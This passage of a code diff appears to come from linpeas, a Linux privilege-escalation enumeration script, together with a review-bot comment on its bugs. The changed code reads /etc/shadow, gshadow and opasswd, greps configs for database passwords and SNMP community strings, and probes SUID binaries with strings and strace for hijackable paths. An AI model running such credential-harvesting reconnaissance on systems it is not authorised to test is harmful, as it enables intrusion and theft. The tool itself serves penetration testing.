'fastcgi_params') + printf "$fastcgi_paramsfiles\n" | while read f; do + ls -l "$f" 2>/dev/null + cat "$f" 2>/dev/null | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${C}[1;31m&${C}[0m," + echo "" + done + echo "" + + #-- SI) SNMP params + printf $Y"[+] "$GREEN"SNMPs\n"$NC + snmpdfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'snmpd.conf') + printf "$snmpdfiles\n" | while read f; do + ls -l "$f" 2>/dev/null + cat "$f" 2>/dev/null | grep -E "rocommunity|rwcommunity" | sed -${E} "s,rocommunity|rwcommunity,${C}[1;31m&${C}[0m," + echo "" + 
done + echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 
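Review bot: `grep -E 'filelliza'` in the new Filezilla block misspells the directory name, so `filezillaconfs` is always empty and the `sitemanager.xml` branch can never run; it should read `grep -E 'filezilla'`. The backup-manager and splunk blocks filter with `grep "'pass'|'password'|'user'|'database'|'host'"`, but in basic grep an unescaped `|` is a literal character, so those filters match nothing unless a line literally contains `'pass'|'password'`; use `grep -E` (or `grep -${E}`, matching the sed calls). The Chrome section prints the `#firefox` hacktricks anchor, apparently copied from the Firefox block above it. `ctr image list` runs without the `2>/dev/null` the other probes in this hunk use, so its errors reach the terminal; worth confirming that is intended. The enclosing `if` on `$CHECKS` starts outside the hunk.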
@@ -2205,70 +2609,142 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ########################################### #----------) Interesting files (----------# ########################################### - printf $B"====================================( "$GREEN"Interesting Files"$B" )=====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Interesting Files"$B" ╠════════════════════════════════════\n"$NC ##-- IF) SUID printf $Y"[+] "$GREEN"SUID - Check easy privesc, exploits and write perms\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - find / -perm -4000 2>/dev/null | while read s; do - if [ -O "$s" ]; then - echo "You own the SUID file: $s" | sed -E "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$s" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + if ! [ "$STRINGS" ]; then + echo_not_found "strings" + fi + if ! [ "$STRACE" ]; then + echo_not_found "strace" + fi + find / -perm -4000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + sname="`echo \"$s\" | awk '{print $9}'`" + if [ "$sname" = "." ] || [ "$sname" = ".." 
]; then + true #Don't do nothing + elif [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else c="a" for b in $sidB; do if [ "`echo $s | grep $(echo $b | cut -d % -f 1)`" ]; then - echo "$s" | sed -E "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then - echo "$s" | sed -E "s,$sidG1,${C}[1;32m&${C}[0m," | sed -E "s,$sidG2,${C}[1;32m&${C}[0m," | sed -E "s,$sidVB,${C}[1;31;103m&${C}[0m," + if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ]; then + echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," + else + echo "$s" | sed -${E} "s,/.*,${C}[1m&${C}[0m," + printf $ITALIC + if [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="`echo \"$sline\" | cut -d ' ' -f1`" + if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then + if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ] && [ "`echo \"$sline_first\" | grep -v \"..\" `" ]; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can 
impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + printf $NC + echo "----------------------------------------------------------------------------------------" + echo "" + fi + fi + fi fi fi done; echo "" + ##-- IF) SGID printf $Y"[+] "$GREEN"SGID\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - find / -perm -g=s -type f 2>/dev/null | while read s; do - if [ -O "$s" ]; then - echo "You own the SGID file: $s" | sed -E "s,.*,${C}[1;31m&${C}[0m," - elif [ -w $s ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + find / -perm -2000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + sname="`echo \"$s\" | awk '{print $9}'`" + sname="`echo \"$s\" | awk '{print $9}'`" + if [ "$sname" = "." ] || [ "$sname" = ".." 
]; then + true #Don't do nothing + elif [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else c="a" for b in $sidB; do - if [ "`echo $s | grep $(echo $b | cut -d % -f 1)`" ]; then - echo "$s" | sed -E "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + if [ "`echo \"$s\" | grep $(echo \"$b\" | cut -d % -f 1)`" ]; then + echo "$s" | sed -${E} "s,$(echo \"$b\" | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then - echo "$s" | sed -E "s,$sidG1,${C}[1;32m&${C}[0m," | sed -E "s,$sidG2,${C}[1;32m&${C}[0m," | sed -E "s,$sidVB,${C}[1;31;103m&${C}[0m," + if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ]; then + echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," + else + echo "$s" | sed -${E} "s,/.*,${C}[1m&${C}[0m," + printf $ITALIC + if [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="`echo \"$sline\" | cut -d ' ' -f1`" + if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then + if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ]; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it 
(strings line: $sline)\n" + fi + fi + fi + done + if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf $ITALIC + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + printf $NC + echo "" + fi + fi + fi fi fi done; echo "" ##-- IF) Misconfigured ld.so - printf $Y"[+] "$GREEN"Cheking missconfigurations of ld.so\n"$NC + printf $Y"[+] "$GREEN"Checking misconfigurations of ld.so\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so\n"$NC printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" cat /etc/ld.so.conf 2>/dev/null | while read l; do if [ "`echo \"$l\" | grep include`" ]; then ini_path="`echo \"$l\" | cut -d " " -f 2`" fpath="`dirname \"$ini_path\"`" - if [ "`find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - printf $ITALIC"$fpath\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" - cat "$f" | grep -v "^#" | sed -E "s,$ldsoconfdG,${C}[1;32m&${C}[0m," | sed -E 
"s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" done fi done @@ -2278,16 +2754,18 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Capabilities\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC echo "Current capabilities:" - (cat "/proc/$$/status" 2> /dev/null | grep Cap | sed -E "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") || echo_not_found "/proc/$$/status" + (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${C}[1;31;103m&${C}[0m," ) || echo_not_found "capsh" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$$/status" echo "" echo "Shell capabilities:" - (cat "/proc/$PPID/status" 2> /dev/null | grep Cap | sed -E "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") || echo_not_found "/proc/$PPID/status" + (capsh --decode=0x"`cat \"/proc/$PPID/status\" 2>/dev/null | grep \"CapEff\" | awk '{print $2}'`" 2>/dev/null) || echo_not_found "capsh" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" echo "Files with capabilities:" getcap -r / 2>/dev/null | while read cb; do - echo "$cb" | sed -E "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -E "s,$capsB,${C}[1;31m&${C}[0m," + echo "$cb" | sed -${E} "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m," if [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then - echo "$cb is writable" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "$cb is writable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," fi done echo "" 
@@ -2296,7 +2774,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Users with capabilities\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," else echo_not_found "/etc/security/capability.conf" fi echo "" 
@@ -2304,21 +2782,31 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Files with ACLs printf $Y"[+] "$GREEN"Files with ACLs\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls\n"$NC - ((getfacl -t -s -R -p /bin /etc /home /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," echo "" ##-- IF) .sh files in PATH printf $Y"[+] "$GREEN".sh files in path\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path\n"$NC - echo $PATH | tr ":" "\n" | while read d; do find "$d" -name "*.sh" 2>/dev/null | sed -E "s,$pathshG,${C}[1;32m&${C}[0m," ; done + echo $PATH | tr ":" "\n" | while read d; do + for f in `find "$d" -name "*.sh" 2>/dev/null`; do + if [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + elif [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + else + echo $f | sed -${E} "s,$shscripsG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,"; + fi + done + done echo "" ##-- IF) Unexpected folders in / - printf $Y"[+] "$GREEN"Unexpected folders in root\n"$NC + printf $Y"[+] "$GREEN"Unexpected in root\n"$NC if [ "$MACPEAS" ]; then - (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsMacG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} 
"s,.*,${C}[1;31m&${C}[0m,") || echo_not_found else - (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found fi echo "" @@ -2326,10 +2814,10 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Files (scripts) in /etc/profile.d/\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files\n"$NC if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ | sed -E "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/" - if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/profile.d/ -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/profile.d/ -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/" + if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi fi echo "" 
@@ -2337,59 +2825,59 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Permissions in init, init.d, systemd, and rc.d\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d\n"$NC if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init.d/ -type f -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d/init.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /usr/local/etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f 
-writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /lib/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w 
-and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w 
-and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi fi echo "" ##-- IF) Hashes in passwd file printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC - if [ "`grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi ##-- IF) Writable in passwd file printf $Y"[+] "$GREEN"Writable passwd file? ................ "$NC - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else echo_no fi ##-- IF) Credentials in fstab printf $Y"[+] "$GREEN"Credentials in fstab/mtab? ........... 
"$NC - if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi ##-- IF) Read shadow files printf $Y"[+] "$GREEN"Can I read shadow files? ............. "$NC - if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi ##-- IF) Read opasswd file printf $Y"[+] "$GREEN"Can I read opasswd file? ............. "$NC - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null + if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" else echo_no fi ##-- IF) network-scripts printf $Y"[+] "$GREEN"Can I write in network-scripts? ...... 
